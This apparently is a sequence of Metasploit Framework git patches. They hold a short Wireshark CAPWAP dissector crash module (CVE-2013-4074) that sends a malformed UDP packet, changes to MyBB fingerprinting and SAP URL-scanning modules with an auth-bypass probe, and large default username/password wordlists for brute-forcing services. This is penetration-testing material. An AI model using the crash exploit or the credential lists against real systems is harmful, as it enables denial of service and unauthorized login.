+administrator 0 +umountsys umountsys +snmp snmp +Username PASSWORD +volition +USER0 USER0 +CDEMOCOR CDEMOCOR +SYSTEST UETP +Rodopi Rodopi +DECNET NONPRIV +user_checker demo + tatercounter2000 +qserv qserv + ESSEX or IPC +AQ AQ +support +SAPR3 SAP +VRR1 VRR1 +fastwire fw +admi admin +FINANCE FINANCE +WinCCAdmin 2WSXcder +ESTOREUSER ESTORE +fax fax +VIRUSER VIRUSER +LINK LINK +APPLSYSPUB FNDPUB + BIOS +SYS ORACLE8 +SYS ORACLE9 +overseer overseer +checksys checksys +umountfs umountfs +DBDCCICS DBDCCIC +Admin password + x6zynd56 +TOAD TOAD +root mozart +ntpupdate ntpupdate +root router +MDDEMO_MGR MGR +ARCHIVIST +SUPERVISOR HARRIS + 11111 +billy-bob +lp bin +DECMAIL DECMAIL +alien alien +admin dnnadmin +nsroot nsroot +AdvWebadmin advcomm500349 +dvstation dvst10n +SERVICECONSUMER1 SERVICECONSUMER1 +MMO2 MMO2 +qsecofr 11111111 +NOC NOC +WWWUSER WWWUSER +root Serial port only +SAP SAPR3 +root t0talc0ntr0l4! +NEVIEW +MAIL +ODSCOMMON ODSCOMMON +fal fal +pixadmin pixadmin +ripeop +PENG + BIOSPASS +netlink netlink +L2LDEMO L2LDEMO +OUTLN OUTLN +12.x +scott tiger or tigger + toshy99 +dbase dbase + nz0u4bbe +fam fam + bell9 +Oper Oper +RMAIL RMAIL +administrator 19750407 +FND FND +admin exinda +PRIV PRIV +admin barney +SETUP + biodata + 24Banc81 +news news +VSEIPO + j09F +pw pw +GUEST +ilon ilon + award_? +SYS 0RACLE39 +SYS 0RACLE38 +DEFAULT DEFAULT + AMI!SW +PLSQL SUPERSECRET +root alpine +politcally correct +18140815 18140815 +APPUSER APPUSER +SUPERVISOR +CENTRA CENTRA +LBACSYS LBACSYS + alfarome +PDP8 PDP8 +SFCMI +administrator * * # +lpadm lpadm +Test Everything +bewan bewan + 2580 +DIP DIP + Sxyz +mfd mfd +MDDEMO MDDEMO + intermec + 589589 +SWPRO SWPRO +DES DES +root fibranne +Coco hello +GCS +rodopi rodopi + touchpwd= +Scott Tiger +Admin5 4tugboat +admin funkwerk +ANDY SWORDFISH +DESQUETOP +nobody +Manager 657 + mysweex +SYSTEM SYSLIB +NETCON NETCON +JONES STEEL +author author +MOESERV +web web +tech User +PUBSUB1 PUBSUB1 +SYS D_SYSPW +CATALOG CATALOG + IBM + Guest +SQLUSER +RE RE +REPORTS_USER OEM_TEMP +MFG MFG +POST POST +HPLASER HPLASER +HR HR +VIDEOUSER VIDEO USER +DBA SQL + CMOSPWD +guest1 guest +superuser asante +SYSTEM 0RACLE38 +SYSTEM 0RACLE39 +AUTOLOG1 +dadmin dadmin +AURORA$JIS$UTILITY$ +wlcsystem wlcsystem +news +CPRM From 74b491e715ccec4434a537ba87bc5ed69438be8c Mon Sep 17 00:00:00 2001 From: JoseMi <jholgui@gmail.com> Date: Sat, 17 May 2014 11:25:38 +0100 Subject: [PATCH 329/853] Delete wireshark_capwap_dos module --- .../windows/misc/wireshark_capwap_dos.rb | 69 ------------------- 1 file changed, 69 deletions(-) delete mode 100644 modules/exploits/windows/misc/wireshark_capwap_dos.rb diff --git a/modules/exploits/windows/misc/wireshark_capwap_dos.rb b/modules/exploits/windows/misc/wireshark_capwap_dos.rb deleted file mode 100644 index 603f5e81ca..0000000000 --- a/modules/exploits/windows/misc/wireshark_capwap_dos.rb +++ /dev/null @@ -1,69 +0,0 @@ -# -# This module requires Metasploit: http//metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -require 'msf/core' - -class Metasploit3 < Msf::Exploit::Remote - - Rank = GoodRanking - - include Msf::Exploit::Remote::Udp - - def initialize(info = {}) - super(update_info(info, - 'Name' => 'Wireshark CAPWAP dissector crash', - 'Description' => %q{ - This module inject malicious packet udp to crash wireshark. The crash is when we send - a incomplete packet and trigger capwap dissector. - ) - }, - 'License' => MSF_LICENSE, - 'Author' => - [ - 'j0sm1', # Exploit and msf module - 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" - ], - 'References' => - [ - [ 'CVE', '2013-4074'], - ], - 'DefaultOptions' => - { - 'EXITFUNC' => 'process', - }, - 'Payload' => - { - 'DisableNops' => 'True', - }, - 'Platform' => 'win', - 'Targets' => - [ - [ 'Wireshark CAPWAP dissector CRASH', - { - } - ], - ], - 'Privileged' => false, - 'DisclosureDate' => 'Apr 28 2014', - 'DefaultTarget' => 0)) - - # Protocol capwap needs port 5247 to trigger the dissector in wireshark - register_options([ Opt::RPORT(5247) ], self.class) - - end - - def exploit - - connect_udp - - # We send a packet incomplete to crash dissector - print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") - buf = "\x90" * 18 - udp_sock.put(buf) - - disconnect_udp - - end -end From 21cf0a162cb8619dc950a765cdd49d57be597e5a Mon Sep 17 00:00:00 2001 From: JoseMi <jholgui@gmail.com> Date: Sat, 17 May 2014 11:31:43 +0100 Subject: [PATCH 330/853] Added module to crash capwap dissector in wireshark tool --- .../dos/wireshark/wireshark_capwap_dos.rb | 69 +++++++++++++++++++ 1 file changed, 69 insertions(+) create mode 100644 modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb diff --git a/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb new file mode 100644 index 0000000000..603f5e81ca --- /dev/null +++ b/modules/auxiliary/dos/wireshark/wireshark_capwap_dos.rb @@ -0,0 +1,69 @@ +# +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + + Rank = GoodRanking + + include Msf::Exploit::Remote::Udp + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Wireshark CAPWAP dissector crash', + 'Description' => %q{ + This module inject malicious packet udp to crash wireshark. The crash is when we send + a incomplete packet and trigger capwap dissector. + ) + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'j0sm1', # Exploit and msf module + 'Laurent Butti' # Discovery vulnerability -> "Reported: 2013-05-28 23:38 UTC by Laurent Butti" + ], + 'References' => + [ + [ 'CVE', '2013-4074'], + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + }, + 'Payload' => + { + 'DisableNops' => 'True', + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Wireshark CAPWAP dissector CRASH', + { + } + ], + ], + 'Privileged' => false, + 'DisclosureDate' => 'Apr 28 2014', + 'DefaultTarget' => 0)) + + # Protocol capwap needs port 5247 to trigger the dissector in wireshark + register_options([ Opt::RPORT(5247) ], self.class) + + end + + def exploit + + connect_udp + + # We send a packet incomplete to crash dissector + print_status("#{rhost}:#{rport} - Trying to exploit #{target.name}...") + buf = "\x90" * 18 + udp_sock.put(buf) + + disconnect_udp + + end +end From 06912ac2b6180258b0ef8ead30eedfd15795bc27 Mon Sep 17 00:00:00 2001 From: Karmanovskii <fnsnic@gmail.com> Date: Sat, 17 May 2014 16:30:29 +0400 Subject: [PATCH 331/853] Update mybb_get_type_db.rb 1.Changed "Rex::Proto::Http::Client" to "Msf::Exploit::Remote::HttpClient" 2.changed the name of the variable "_Version_server". --- modules/auxiliary/gather/mybb_get_type_db.rb | 54 ++++++++++---------- 1 file changed, 27 insertions(+), 27 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index a61c1166d1..e007166e77 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -36,24 +36,24 @@ class Metasploit3 < Msf::Auxiliary def check begin uri = normalize_uri(target_uri.path, '/index.php?intcheck=1') - nclient = Rex::Proto::Http::Client.new(datastore['RHOST'], datastore['RPORT'], - { - 'Msf' => framework, - 'MsfExploit' => self, - }) - req = nclient.request_cgi({ - 'uri' => uri, - 'method' => 'GET',}) - if req.nil? + res = send_request_cgi( + { + 'method' => 'GET', + 'uri' => uri, + 'vars_get' => { + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + } + }) + if res.nil? print_error("Failed to retrieve webpage.") return Exploit::CheckCode::Unknown end - if req - res = nclient.send_recv(req, 1024) - else - print_status("Error: #{datastore['RHOST']}:#{datastore['RPORT']} did not respond on.") - return Exploit::CheckCode::Unknown - end + if res.code != 200 print_error("Unable to query to host: #{datastore['RHOST']}:#{datastore['RPORT']} (#{datastore['TARGETURI']}).") return Exploit::CheckCode::Unknown @@ -69,19 +69,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + web_server = res['Server'] + if web_server + web_server = " Server Version: #{web_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + web_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+web_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err @@ -99,12 +99,12 @@ class Metasploit3 < Msf::Auxiliary 'method' => 'GET', 'uri' => uri, 'vars_get' => { - 'Accept' => 'text/html, application/xhtml+xml, */*', - 'Accept-Language' => 'ru-RU', - 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', - 'Accept-Encoding' => 'gzip, deflate', - 'Connection' => 'Close', - 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" + 'Accept' => 'text/html, application/xhtml+xml, */*', + 'Accept-Language' => 'ru-RU', + 'User-Agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko', + 'Accept-Encoding' => 'gzip, deflate', + 'Connection' => 'Close', + 'Cookie' => "mybb[lastvisit]="+Time.now.to_i.to_s+"; mybb[lastactive]="+Time.now.to_i.to_s+"; loginattempts=1" } }) if response.nil? From dd1a47f31f2464869cb73dae0ab13189b22eb268 Mon Sep 17 00:00:00 2001 From: sappirate <sappirate@gmail.com> Date: Wed, 26 Mar 2014 21:14:39 +0100 Subject: [PATCH 332/853] Modified sap_icm_urlscan to check for authentication of custom URLs Fixed ruby coding style --- .../auxiliary/scanner/sap/sap_icm_urlscan.rb | 27 ++++++++++++++++--- 1 file changed, 24 insertions(+), 3 deletions(-) diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index 2cff53d60b..870936569c 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -89,6 +89,8 @@ class Metasploit3 < Msf::Auxiliary urls_to_check.each do |url| check_url(url.strip) end + # check custom URLs + check_urlprefixes else print_error("#{rhost}:#{rport} No response received") end @@ -110,7 +112,7 @@ class Metasploit3 < Msf::Auxiliary case when res.code == 200 - print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)") + print_good("#{rhost}:#{rport} #{url} - does not require authentication (200) (length: #{res.headers['Content-Length']})") when res.code == 403 print_good("#{rhost}:#{rport} #{url} - restricted (403)") when res.code == 401 @@ -129,7 +131,7 @@ class Metasploit3 < Msf::Auxiliary end else - print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)") + print_status("#{rhost}:#{rport} #{url} - not found (No Response code Received)") end end @@ -143,9 +145,28 @@ class Metasploit3 < Msf::Auxiliary }, 20) if (res and res.code == 200) - print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering") + print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering (length: #{res.headers['Content-Length']})") else print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering") end end + + def check_urlprefixes + # "/urlprefix outputs the list of URL prefixes that are handled in the ABAP part of the SAP Web AS. This is how the message server finds out which URLs must be forwarded where." (SAP help) + # -> this disclose custom URLs that are also checked for authentication + res = send_request_cgi({ + 'uri' => "/sap/public/icf_info/urlprefix", + 'method' => 'GET', + 'ctype' => 'text/plain', + }, 20) + if (res and res.code == 200) + res.body.each_line do |line| + if line =~ /PREFIX=/ + url_enc = line.sub(/^PREFIX=/, '') + url_dec = URI.unescape(url_enc).sub(/;/, '') + check_url(url_dec.strip) + end + end + end + end end From 6ec926b573f945e9590b306be292b4152b08a38a Mon Sep 17 00:00:00 2001 From: Tonimir Kisasondi <kisasondi@gmail.com> Date: Sun, 18 May 2014 10:18:07 +0200 Subject: [PATCH 333/853] Added separate users/pass/userpass dictionaries --- .../default_passwords_for_services_unhash.txt | 1214 +++++++++++ .../default_userpass_for_services_unhash.txt | 1787 +++++++++++++++++ .../default_users_for_services_unhash.txt | 915 +++++++++ 3 files changed, 3916 insertions(+) create mode 100644 data/wordlists/default_passwords_for_services_unhash.txt create mode 100644 data/wordlists/default_userpass_for_services_unhash.txt create mode 100644 data/wordlists/default_users_for_services_unhash.txt diff --git a/data/wordlists/default_passwords_for_services_unhash.txt b/data/wordlists/default_passwords_for_services_unhash.txt new file mode 100644 index 0000000000..7203bcda29 --- /dev/null +++ b/data/wordlists/default_passwords_for_services_unhash.txt @@ -0,0 +1,1214 @@ +admin + +password +1234 +epicrouter +sysadm +access +root +tech +smcadmin +0 +pass +system +PASSWORD +Symbol +guest +bintec +security +synnet +manager +adtran +motorola +smile +cascade +BRIDGE +netman +super +switch +setup +changeme +operator +user +Cisco +Manager +TJM +apc +cisco +letmein +router +trancell +ascend +friend +NetICs +blender +netscreen +SKY_FOX +public +Master +default +laflaf +cmaker +RSX +Posterie +private +attack +monitor +xdfk9874t3 +netopia +Col2ogro2 +microbusiness +op +OCS +secure +atlantis +sysadmin +5777364 +echo +maint +SESAME +danger +lucenttech2 +d.e.b.u.g +hello +SYSTEM +calvin +xxyyzz +highspeed +123 +Sharp +mysweex +4tas +masterkey +0000 +permit +barricade +support +tslinux +hp.com +recovery +PASSW0RD +engineer +administrator +pwp +isee +NETWORK +JDE +superuser +Super +admin123 +surt +rwa +123456 +NetCache +ADTRAN +USER +test +extendnet +ironport +lp +1111 +PASS +ro +Ascend +_Cisco +MAIL +sitecom +hsadb +CAROLIAN +ADMINISTRATOR +sysAdmin +tini +Helpdesk +SERVICE +PBX +FIELD.SUPPORT +sys +abc123 +1502 +star +MGR.SYS +anicust +Administrator +Intel +12345 +lucenttech1 +secret +piranha +wlsedb +l3 +diamond +naadmin +1988 +radius +MANAGER.SYS +raidzone +3ascotel +HPOFFICE +demo +166816 +Password +zoomadsl +D-Link +l2 +CCC +rw +cgadmin +specialist +NetVCR +COGNOS +q +MServer +cms500 +davox +enquirypw +at4400 +h179350 +asd +240653C9467E45 +atc123 +admin_1 +266344 +WORD +ITF3000 +connect +HPONLY +nmspw +client +comcomcom +speedxess +ROBELLE +uplink +SYS +letacla +FORCE +REMOTE +backdoor +CNAS +22222 +gen2 +medion +admn +56789 +PRODDTA +tellabs#1 +dadmin01 +dhs3mt +SECURITY +changeme! +llatsni +adfexc +Asante +!manage +21241036 +TELESUP +crftpw +help +lantronix +netadmin +HP +SUPPORT +VESOFT +$secure$ +OP.OPERATOR +hs7mwxkk +patrol +SUPER +SMDR +1064 +DISC +cellit +INTX3 +inads +tlah +wyse +locatepw +visual +r@p8p0r+ +xbox +TENmanUFactOryPOWER +device +NICONEX +admin1234 +fivranne +acc +31994 +bcimpw +bluepw +PlsChgMe +R1QTPS +ccrusr +MPE +telecom +gen1 +SSA +snmp-Trap +HTTP +mtch +adslolitec +ganteng +bciimpw +browsepw +Admin +change_on_install +changeme2 +Exabyte +rmnetlm +replicator +intel +HPP196 +radware +intermec +mlusr +RJE +LOTUS +initpw +e250changeme +SpIp +adminttd +field +supportpw +MiniAP +RIP000 +XLSERVER +HPP187 +HPP189 +indspw +linga +craft +enter +NAU +rcustpw +AitbISP4eCiG +mtcl +CONV +bcnaspw +NETBASE +REGO +cacadmin +mediator +talent +kermit +x-admin +HPDESK +9999 +ROOT500 +my_DEMARC +volition +GlobalAdmin +4getme2 +UI-PSWD-01 +2222 +UI-PSWD-02 +TCH +Fireport +ILMI +maintpw +supervisor +e500changeme +mu +NULL +custpw +noway +tiaranet +bcmspw +TANDBERG +m1122 +telco +xd +dhs3pms +winterm +craftpw +rwmaint +any@ +looker +none +MANAGER +1234admin +MGR +tuxalize +timely +User +8429 +manage +Babylon +hagpolm1 +scmchangeme +tivonpw +installer +webadmin +pbxk1064 +19920706 +pento +NetSurvibox +D_SYSTPW +3477 +$chwarzepumpe +asecret +10023 +help1954 +corecess +master +Protector +HPWORD +symbol +weblogic +sys/change_on_install +3ep5w2u +8111 +jannie +tomcat +pilou +3ware +ANYCOM +tiger123 +asante +smallbusiness +ntacdmax +w2402 +wlsepassword +kilo1987 +articon +michelangelo +Mau'dib +Serial +ggdaseuaimhrke +maintain +syslib +init +PUBSUB +CTXSYS +bill +60020 +dmr99 +GUEST +06071992 +Trintech +otbu+1 +Multi +babbit +w0rkplac3rul3s +Telecom +qsysopr +imss7.0 +nokia +APPS +isdev +mail +draadloos +qsecofr +default.password +5678 +nimdaten +456 +P@55w0rd! +par0t +db2fenc1 +control +isp +QSRV +iDirect +MDSYS +vpasp +TEST +QSECOFR +2501 +leviton +blank +informix +mpegvideo +games +0P3N +hawk201 +scout +qpgmr +admin000 +expert03 +images +surecom +Geardog +symantec +adslroot +xyzzy +adaptec +serial# +BACKUP +stratauser +rootme +!root +webibm +riverhead +COMPANY +DSL +amber +eagle +brightmail +HEWITT +ods +toplayer +OkiLAN +rootpass +wrgg15_di524 +x40rocks +nokai +Admin1 +ImageFolio +iolan +pfsense +sales +iscopy +OEM_TEMP +RSAAppliance +themaster01 +ANS#150 +passwort +welcome +NetSeq +BRIO_ADMIN +citel +oracle +kn1TG7psLu +SYSPASS +lkwpeter +DEV2000_DEMOS +checkfs +USER1 +resumix +HELP +logapp +0RACLE9 +0RACLE8 +57gbzb +qsrvbas +sldkj754 +STRAT_PASSWD +19750407 +USERP +primeos +OEMREP +[^_^] +USER6 +TTPTHA +powerdown +Mau’dib +ORACL3 +nimda +DEMO +2WSXcder +ALLIN1 +sysadmpw +QSRVBAS +ip305Beheer +ACCORD +AQJAVA +LASERWRITER +nsi +PERFSTAT +MBWATCH +protection +unix +OWNER +NETPRIV +AWARD?SW +changethis +SYMPA +REP_OWNER +DCL +dbps +ARCHIVIST +basisk +demos +NETMGR +OAS_PUBLIC +AP +j5Brn9 +MTSSYS +DIGITAL +AUDIOUSER +teX1 +allot +$SRV +0RACLE +nicecti +ROOT +PRINTER +m1link +l1 +trouble +trendimsa1.0 +HOST +ADLDEMO +QS_ADM +AMI +OPER +PO7 +komprie +MAINT +toor +AMISETUP +sp99dd +halt +MSHOME +secacm +3Com +db2admin +Airaya +visor +Wireless +IMEDIA +Biostar +install +primos +infrant1 +Partner +Administrative +USER_TEMPLATE +pnadmin +h6BB +lpadmin +VTAM +TRACE +POSTMASTER +MAILER +QS_WS +sma +system_admin +nobody +Tasmannet +!admin +DISCOVERER_ADMIN +LR-ISDN +TURBINE +GL +PO +AMI_SW +superpass +YES +GATEWAY +PRIMARY +award.sw +lucy99 +pwpw +EMP +cclfb +SITEMINDER +Any +vgnadmin +NEWS +Ektron +Award +AQUSER +UTLESTAT +AMIAMI +netbotz +CHANGE_ON_INSTALL +sap123 +Crystal +Daewuu +ftp +(random +MCUser1 +admpw +rootadmin +PM +ULTIMATE +role1 +enhydra +NF +EVENT +xyzall +rainbow +JETSPEED +PORTAL30_SSO_PS +OO +WKSYS +OPERATNS +ksdjfg934t +merlin +OE +Local +OCITEST +HLT +last +CTXDEMO +zebra +QDBA +LRISDN +tele +WEBCAL01 +rsadmin +ORACLE +alien +sanfran +ReadOnly +AMIPSWD +MOREAU +abd234 +QNX +dnnhost +sertafu +ORDPLUGINS +telos +ADMIN +adminpass +crash +ACCESS +SDOS_ICSAP +adminpwd +BATCH +GUESTGUEST +SYSMAINT +postmast +DSSYS +award_ps +ZAAADA +MGWUSER +NTCIP +hewlpack +TDOS_ICSAP +ssp +EJSADMIN +damin +INGRES +A.M.I +1322222 +VCSRV +storageserver +ssladmin +CLOTH +shutdown +OEMADM +restoreonly1 +quser +MILLER +trmcnfg +REPORT +aLLy +tour +mountfsys +PROG +iwill +Public +mp3mystic +hpt +peribit +STARTER +GUESTGUE +guardone +daemon +mountsys +ORACLE9 +ORACLE8 +gandalf +backuponly1 +leaves +syspw +blablabla +Compleri +USER3 +OPENSPIRIT +spooml +changeit +wg +Vextrex +qsvr +lynx +Sysop +IMAGEUSER +bsxpass +USER9 +ax400 +OPERATOR +Mau?dib +MASTER +t00lk1t +Daytec +SZYX +CTX_123 +rje +MTRPW +QS_ES +mysecretpassword0* +GPLD +uucp +DBSNMP +TSEUG +SWUSER +8RttoTriz +Operator +honey +accounting +backuprestore1 +PRINT +j322 +Craftr4 +dni +*3noguru +FAX +anon +j256 +USER8 +PORTAL30_SSO_PUBLIC +589721 +WINSABRE +shs +PORTAL30_SSO +ALLIN1MAIL +xo11nE +nms +SYSADM +me +NFI +SECDEMO +AR#Admin# +ORAREGSYS +SNOWMAN +LASER +?award +WLAN_AP +WWW +VAX +Cable-docsis +UNKNOWN +LdapPassword_1 +3 +Zenith +setup/nopasswd +DSGATEWAY +CSMIG +year2000 +umountfsys +BIGO +jstwo +VMS +bpel +viewuser1 +ISPMODE +correct +conexant +ip3000 +COMPIERE +OSP22 +guest1 +FORSE +lesarotl +factory +(unknown) +ip20 +ip21 +QUSER +AWARD +prime +tr650 +poll +j262 +xljlbj +glftpd +Advance +RMAN +mountfs +console +firstsite +SW_AWARD +snake +Gateway +TSUSER +123123 +3098z +cc +nopasswd +WebBoard +SYS1 +BC4J +phpreactor +OPERVAX +Congress +central +WANGTEK +etas +OWA +USER2 +jasperadmin +uClinux +guestgue +FAXUSER +SABRE +ip400 +AMI.KEY +AMI.KEZ +inuvik49 +11111111 +qsrv +PORTAL31 +PORTAL30 +XPRT +zjaaadc +ilom-admin +rdc123 +sysopr +tasmannet +0RACLE8I +store +SER +IP +WEBREAD +ODM +INVALID +WOOD +vertex25 +bin +lineprin +www +dbpass +$rfmngr$ +sync +SYSTEST +user0000 +ilom-operator +HELGA-S +NETNONPRIV +CIDS +primenet +redline +muze +MBMANAGER +FND +WINDOWS_PASSTHRU +USER4 +hqadmin +123qwe +BASE +dn_04rjc +uucpadm +FAXWORKS +password1 +EXFSYS +JMUSER +imsa7.0 +NETFRAME +CIS +ciscofw +HLW +brocade1 +pwrchute +Tiny +svcPASS83 +nsa +!ishtar +NeXT +TELEDEMO +AMIDECOD +recover +TRAVEL +efmukl +raritan +PO8 +NAMES +secofr +biostar +USER7 +OWA_PUBLIC +questra +builtin +6071992 +boss +isolation +Q54arwms +PLEX +OLAPDBA +g6PJ +INSTANCE +pixmet2003 +Lund +ibmcel +CMSBATCH +ABCD +AM +condo +Toshiba +familymacintosh +TAHITI +NEWINGRES +AMI?SW +mMmM +man +powerapp +service +VIF_DEV_PWD +WELCOME +Barricade +joeuser +HELPDESK +wlpisystem +prtgadmin +CONCAT +t0ch88 +webmaster +djonet +Compaq +CISINFO +dottie +QS_CB +CDEMORID +nician +MANAG3R +PORTAL30_PUBLIC +nortel +CLERK +FIELD +SECRET123 +Guest +amigosw1 +xmux +SENTINEL +ducati900ss +22222222 +lkw +awkward +TzqF +SYSTEST_CLIG +ODS +axis2 +PAPER +TSDEV +joh316 +dos +hdms +phplist +novell +CISSUS +passw0rd +trade +kronites +QS_CBADM +SYSA +00000000 +STUDENT +SECONDARY +OOOOOOOO +xceladmin +j64 +MTS_PASSWORD +AWARD_SW +AQDEMO +ReadWrite +GWrv +MagiMFP +SnuFG5 +IS_$hostname +badg3r5 +ORASSO +t0ch20x +SH +zeosx +X#1833 +wodj +FOOBAR +SYSMAN +urchin +PORTAL30_DEMO +QS_CS +PlsChgMe! +MCUrv +adminadmin +userNotU +AMI~ +ibm +ncadmin +TESTPILOT +Polrty +UETP +QS +MUMBLEFRATZ +AIROPLANE +APPS_MRC +uboot +netgear1 +asd123 +PDP11 +aammii +SLIDEPW +bagabu +Spacve +256256 +INFO +checkfsys +PRODCICS +foolproof +AWARD_PW +MXAGENT +ORACLE8I +no +POWERCARTUSER +QDI +shiva +distrib0 +SUPERVISOR +MIGRATE +CDEMOUCB +c +sysbin +signa +autocad +SWITCHES_SW +WEBDB +aPAf +ncrm +SAMPLE +1 +HCPARK +ALLINONE +nm2user +PATROL +technolgi +MBIU0 +adm +tutor +CHEY_ARCHSVR +software +bbs +Dell +disttech +zbaaaca +prost +ORDSYS +1234567890 +gopher +RM +s!a@m#n$p%c +DECNET +OPERATIONS +PANAMA +SHELVES +4Dgifts +biosstar +NETSERVER +tiny +APC +USER5 +GPFD +12345678 +QS_OS +REPADMIN +DEMO8 +DEMO9 +CDEMO82 +boca +vision2 +umountsys +snmp +USER0 +CDEMOCOR +Rodopi +NONPRIV +tatercounter2000 +qserv +ESSEX +AQ +SAP +VRR1 +fw +FINANCE +ESTORE +fax +VIRUSER +LINK +FNDPUB +BIOS +overseer +checksys +umountfs +DBDCCIC +x6zynd56 +TOAD +mozart +ntpupdate +HARRIS +11111 +DECMAIL +dnnadmin +nsroot +advcomm500349 +dvst10n +SERVICECONSUMER1 +MMO2 +NOC +WWWUSER +SAPR3 +t0talc0ntr0l4! +ODSCOMMON +fal +pixadmin +BIOSPASS +netlink +L2LDEMO +OUTLN +tiger +toshy99 +dbase +nz0u4bbe +fam +bell9 +Oper +RMAIL +exinda +PRIV +barney +biodata +24Banc81 +news +j09F +pw +ilon +award_? +0RACLE39 +0RACLE38 +DEFAULT +AMI!SW +SUPERSECRET +alpine +18140815 +APPUSER +CENTRA +LBACSYS +alfarome +PDP8 +* +lpadm +Everything +bewan +2580 +DIP +Sxyz +mfd +MDDEMO +589589 +SWPRO +DES +fibranne +rodopi +touchpwd= +Tiger +4tugboat +funkwerk +SWORDFISH +657 +SYSLIB +NETCON +STEEL +author +web +PUBSUB1 +D_SYSPW +CATALOG +IBM +RE +MFG +POST +HPLASER +HR +VIDEO +SQL +CMOSPWD +dadmin +wlcsystem diff --git a/data/wordlists/default_userpass_for_services_unhash.txt b/data/wordlists/default_userpass_for_services_unhash.txt new file mode 100644 index 0000000000..8610e57e07 --- /dev/null +++ b/data/wordlists/default_userpass_for_services_unhash.txt @@ -0,0 +1,1787 @@ +admin:admin +: +admin: +:admin +admin:password +admin:1234 +root: +Administrator:admin +admin:epicrouter +sysadm:sysadm +:1234 +:password +:access +root:root +tech:tech +:smcadmin +:0 +Administrator: +root:pass +:system +root:admin +:PASSWORD +:Symbol +operator: +guest:guest +admin:bintec +security:security +guest: +debug:synnet +manager:manager +:adtran +admin:motorola +service:smile +:cascade +admin:0 +!root: +user:password +:BRIDGE +netman:netman +super:super +admin:switch +admin:setup +admin:changeme +diag:switch +operator:operator +user:user +user: +Cisco:Cisco +Manager:Manager +DTA:TJM +apc:apc +tech: +:cisco +User: +root:1234 +Admin: +:letmein +cablecom:router +adm: +wradmin:trancell +:ascend +manager:friend +:NetICs +root:blender +netscreen:netscreen +:sysadm +:SKY_FOX +sa: +:public +:Master +setup:setup +root:default +:laflaf +cmaker:cmaker +enable: +MICRO:RSX +login:admin +:Posterie +write:private +root:attack +monitor:monitor +:private +:xdfk9874t3 +netopia:netopia +:Col2ogro2 +admin:microbusiness +op:op +adminview:OCS +op:operator +admin:secure +admin:atlantis +sysadmin:sysadmin +super:5777364 +echo:echo +craft: +adm:cascade +admin:default +maint:maint +comcast:1234 +CSG:SESAME +diag:danger +readonly:lucenttech2 +admin:operator +Manager: +debug:d.e.b.u.g +admin:hello +:SYSTEM +root:ascend +root:calvin +manuf:xxyyzz +cusadmin:highspeed +admin:123 +smc:smcadmin +admin:Sharp +root:password +sweex:mysweex +disttech:4tas +su:super +admin:system +root:changeme +poll:tech +sysadmin:password +SYSDBA:masterkey +anonymous: +:0000 +root:permit +admin:barricade +support:support +root:tslinux +admin:hp.com +recovery:recovery +USERID:PASSW0RD +eng:engineer +administrator:administrator +admin:pwp +admin:isee +NETWORK:NETWORK +JDE:JDE +admin:superuser +Guest: +:Super +admin:admin123 +super:surt +rwa:rwa +admin:123456 +admin:NetCache +:ADTRAN +USER:USER +test:test +admin:extendnet +admin:ironport +lp:lp +:Cisco +administrator: +admin:1111 +sysadmin:PASS +ro:ro +admin:Ascend +:_Cisco +MAIL:MAIL +ami: +:sitecom +hsa:hsadb +system:password +MGR:CAROLIAN +ADMINISTRATOR:ADMINISTRATOR +admin:sysAdmin +root:tini +admin:smcadmin +:Helpdesk +FIELD:SERVICE +PBX:PBX +netman: +HELLO:FIELD.SUPPORT +system:sys +hscroot:abc123 +1502:1502 +:star +superuser:admin +HELLO:MGR.SYS 